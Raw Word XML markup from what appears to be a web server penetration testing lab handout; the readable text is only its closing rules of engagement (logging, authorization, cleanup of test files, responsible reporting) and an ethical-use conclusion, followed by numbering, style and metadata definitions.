    <w:p w14:paraId="0B8FF26F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Documentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep detailed logs of all actions taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54529C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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No Production Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Never test against live, production systems without explicit written authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1ECAF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Cleanup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove all uploaded shells and test files after completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111D064" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Reporting Chain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> If real vulnerabilities are discovered, report through proper channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374457F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="05D39EBA">
          <v:rect id="_x0000_i1035" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B09AE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCF2B75" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>These hands-on activities provide practical experience with modern web server penetration testing. Mastery of these skills is essential for security professionals. Remember: with great power comes great responsibility. Use this knowledge ethically and legally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC2C1E" w14:textId="77777777" w:rsidR="00676A80" w:rsidRDefault="00676A80"/>
    <w:sectPr w:rsidR="00676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CEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B49A3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1012A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A610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360FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06E0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C740B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578E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C24E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D62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B4C59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94340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B79AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E28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D55FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84C2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2574A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D266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EF5457"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91C4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3524D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="571C3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314A66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBE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61977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C88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52F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E6A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F7EBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9C26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A16551"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5288B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E436FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DE0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5240C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9446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780E79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D37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534D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C85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1C74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63B0C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EE31AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FEE4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2812E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F904D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006284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76EC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E1FAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5D2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36086"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0820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8E005A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6560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541AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD2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D25F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D00A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8C2569"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB8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737F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E00E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C56F63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F66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E26DA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97BA3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AB58C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D34C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0C7406"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A76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A355D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C48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DA7F06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C930E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445E67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEFE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A3090"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87DA4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DE5FAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1EAD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34413D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="174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102D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E270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63606">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1879271411">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="763918842">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="495852208">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1159273472">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2055932178">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1603220661">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="600187343">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="605432803">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1272515733">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="574899212">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2078238243">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1783651118">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1475684531">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="837157923">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1431003529">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1717462896">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="358820896">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1545822680">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="709107146">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1551384787">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1153448936">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1249387430">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="170486156">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1667903172">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="245498068">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1023704223">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1313101247">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1594700600">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1047224292">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1615019392">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1385569883">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1790004136">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="759520850">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1805081371">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1337536059">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1490173721">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="308217682">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="2044790644">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="559631810">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1984844294">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="12180083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9C"/>
    <w:rsid w:val="000744D6"/>
    <w:rsid w:val="002F5AD6"/>
    <w:rsid w:val="00676A80"/>
    <w:rsid w:val="007655D5"/>
    <w:rsid w:val="00885E3F"/>
    <w:rsid w:val="009A3E44"/>
    <w:rsid w:val="009F3015"/>
    <w:rsid w:val="00D9219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14EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0BD082F3-FC2E-CE47-8EF5-D59F70C22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2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2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2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19C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D92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19C"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D9219C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D9219C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D9219C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D92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19C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D9219C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D9219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9219C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D9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9219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D921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3650</Words>
  <Characters>20806</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>173</Lines>
  <Paragraphs>48</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24408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Hafiz Adnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hussain Hafiz Adnan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-23T05:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-30T12:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>